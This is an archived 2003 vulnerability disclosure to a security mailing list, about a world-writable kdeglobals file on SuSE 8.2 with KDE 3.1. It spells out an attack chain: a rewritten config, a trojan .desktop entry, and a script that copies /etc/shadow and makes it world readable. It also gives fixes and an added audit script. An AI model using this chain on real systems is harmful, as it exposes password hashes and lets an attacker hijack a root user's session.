KDE 3.1 - Suse 8.2 - kdeglobals world writable

From: Martin Fallon (mar_fallon_at_yahoo.com.br)
Date: 11/14/03

  • Next message: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
    Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)
    To: vuln-dev@securityfocus.com
    
    

    Hi, Mrs.!

    I have found one problem in Suse 8.2 with KDE 3.1
    (default installation in Brazilian version). The
    configuration file "kdeglobals" in
    /etc/opt/kde3/share/config is world writable.

    An attacker can exploit this vulnerability
    in many ways.

    One basic example of an attack is:

    I - Overwrite the kdeglobals file with the contents
    below:

    #
    # written by SuSEconfig.kde
    #
    [Locale]
    Country=pt
    Language=pt:BR

    # Entries below have already been changed.

    [Paths]
    Desktop=/tmp/Desktop

    II - Create the folder /tmp/Desktop and a trojan
    horse in some .desktop file inside it. Example:

    glaudson@suse:/tmp/Desktop> cat xpdf.desktop
    [Desktop Entry]
    Exec=/tmp/AutoStart/teste.sh
    Icon=gv
    TerminalOptions=
    Path=
    Type=Application
    Terminal=0
    X-KDE-StartupNotify=false
    glaudson@suse:/tmp/Desktop>

    III - Create the file to execute, /tmp/AutoStart/teste.sh,
    with backdoor/trojan/spyware/malware code. Example:

    glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
    #!/bin/bash
    cp /etc/shadow /tmp/shadow
    chmod 0777 /tmp/shadow

    The icon "xpdf" will appear on root's desktop.
    If root runs the icon, he runs the trojan horse and
    the attack will have succeeded.

    There are many other ways to exploit this bug.

    Solution:

    chmod 0500 /etc/opt/kde3/share/config/kdeglobals
    or
    rm -rf /etc/opt/kde3/share/config/kdeglobals

    There are also other world-writable files
    in Suse 8.2 (Brazilian version):

    glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \)
    /etc/opt/kde3/share/config/kmailrc
    /etc/opt/kde3/share/config/kioslaverc
    /etc/opt/kde3/share/config/kdeglobals.SuSEconfig
    /etc/opt/kde3/share/config/kdeglobals
    find: /etc/opt/kde3/share/servicetypes: Permissão negada

    glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
    SuSE Linux 8.2 (i586)
    VERSION = 8.2
    glaudson@suse:/tmp/Desktop> cat /proc/version
    Linux version 2.4.20-4GB-athlon (root@Athlon.suse.de) (gcc version 3.3 20030226 (prerelease) (SuSE Linux)) #1 Mon Mar 17 17:56:47 UTC 2003

    Best Regards,

    Martin Fallon.
    Mercenarie's Club
    http://cdm.frontthescene.com.br/
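
An audit for the condition reported above, as an added example that is not part of the original post: it reuses the post's find predicate to list world-writable entries in a config directory and also flags [Paths] entries that point into /tmp or /var/tmp. The function names are hypothetical, and treating /tmp and /var/tmp as the shared locations to flag is an assumption.

```shell
#!/bin/sh
# Added example: function names and the /tmp, /var/tmp check are assumptions.

# List world-writable entries under $1 with the same predicate as the post's
# find command (skips symlinks, char devices, sockets and sticky-bit entries).
audit_world_writable() {
    find "$1" -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \) \
        -print 2>/dev/null
}

# Print key=value lines from the [Paths] group of KDE config file $1 whose
# value points into a shared, world-writable location (/tmp or /var/tmp).
suspicious_paths() {
    awk '
        /^\[/ { in_paths = ($0 == "[Paths]"); next }
        in_paths && /^[^#]*=/ {
            val = $0; sub(/^[^=]*=/, "", val)
            if (val ~ /^\/(var\/)?tmp(\/|$)/) print
        }
    ' "$1"
}

# Report both findings for config directory $1; returns 1 if anything is found.
audit_kde_config() {
    dir=$1; rc=0
    ww=$(audit_world_writable "$dir")
    if [ -n "$ww" ]; then
        echo "$ww" | sed 's/^/WORLD-WRITABLE: /'
        rc=1
    fi
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        hits=$(suspicious_paths "$f")
        if [ -n "$hits" ]; then
            echo "REDIRECTED PATH in $f: $hits"
            rc=1
        fi
    done
    return $rc
}

# Stand-alone use: sh audit.sh /etc/opt/kde3/share/config
if [ $# -gt 0 ]; then audit_kde_config "$1"; fi
```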


